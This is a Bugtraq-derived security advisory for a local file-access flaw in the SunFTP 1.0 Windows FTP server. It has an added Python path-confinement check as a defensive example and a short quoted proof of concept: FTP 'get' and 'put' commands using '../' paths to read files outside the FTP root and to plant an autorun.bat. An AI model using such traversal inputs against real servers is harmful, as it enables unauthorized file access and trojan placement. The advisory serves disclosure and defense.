SunFTP Unauthorized File Access Vulnerability
BID:2428
Info
| Bugtraq ID: | 2428 |
| Class: | Access Validation Error |
| CVE: | |
| Remote: | No |
| Local: | Yes |
| Published: | Mar 02 2001 12:00AM |
| Updated: | Mar 02 2001 12:00AM |
| Credit: | Posted to Bugtraq by <[email protected]> on March 2, 2001. |
| Vulnerable: | Rasmus J.P. Allenheim SunFTP 1.0 Build 9 |
| Not Vulnerable: | |
Discussion
SunFTP is a freeware FTP server for the Windows platform, written by Rasmus J.P. Allenheim and associates.
SunFTP contains a vulnerability that may allow FTP users to compromise the server. Users may be able to upload or retrieve files from outside the protected ftp-root directory.
This could allow users, for example, to place trojan horse programs on the system and gain control.
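The root-confinement check that prevents this class of bug, as an added example (not SunFTP code and not part of the original advisory). The root C:\ftproot, the function names and the sample arguments other than the two paths quoted on this page are assumptions made for illustration.

```python
import ntpath  # Windows path rules, usable on any OS for this demonstration


class PathEscapeError(ValueError):
    """Raised when a client-supplied path resolves outside the FTP root."""


def resolve_in_root(ftp_root, virtual_cwd, requested):
    """Map an FTP path argument to a real path, or raise PathEscapeError."""
    req = requested.replace("/", "\\")
    cwd = virtual_cwd.replace("/", "\\")
    # ':' covers drive letters (C:\...) and NTFS alternate data streams.
    if "\x00" in req or ":" in req:
        raise PathEscapeError("illegal character in path: %r" % requested)
    # A leading separator means "relative to the virtual root", not the disk.
    virtual = req if req.startswith("\\") else cwd + "\\" + req
    root = ntpath.normpath(ftp_root)
    # normpath collapses '.', '..' and doubled separators lexically.
    candidate = ntpath.normpath(root + "\\" + virtual.lstrip("\\"))
    # Compare case-insensitively and on a separator boundary, so that
    # C:\ftproot-private is not mistaken for a child of C:\ftproot.
    c, r = ntpath.normcase(candidate), ntpath.normcase(root)
    if c != r and not c.startswith(r.rstrip("\\") + "\\"):
        raise PathEscapeError("path escapes FTP root: %r" % requested)
    # Lexical check only: a real server must also resolve junctions and
    # symlinks (for example with os.path.realpath) before this comparison.
    return candidate


def is_allowed(ftp_root, virtual_cwd, requested):
    """True when the argument stays inside the root, False otherwise."""
    try:
        resolve_in_root(ftp_root, virtual_cwd, requested)
        return True
    except PathEscapeError:
        return False


if __name__ == "__main__":
    ROOT = "C:\\ftproot"  # constructed root directory (assumption)
    samples = [("/", "../sunftptest.txt"), ("/", "../autorun.bat"),
               ("/pub", "../index.txt"), ("/", "../ftproot-private/x"),
               ("/pub", "readme.txt"), ("/", "C:\\boot.ini")]
    for cwd, arg in samples:
        verdict = "allow" if is_allowed(ROOT, cwd, arg) else "deny"
        print("%-5s cwd=%-5s arg=%s" % (verdict, cwd, arg))
```

The same check has to run on every command that takes a path argument (retrieve, store, change directory, delete, rename), not only on downloads.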
Exploit / POC
The following is from the post to Bugtraq by <[email protected]>:
Using this vulnerability to retrieve a file from outside the ftp-root (sunftptest.txt):
ftp> get ../sunftptest.txt
200 Port command successful.
150 Opening data connection for ../sunftptest.txt.
226 File sent ok
Using this vulnerability to place a file on the target filesystem outside the ftp-root (../autorun.bat):
ftp> put
Lokale Datei c:\test.txt
Remotedatei ../autorun.bat
Solution / Fix
Solution:
This FTP server no longer appears to be supported. It is suggested that users upgrade to a supported FTP server.
Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].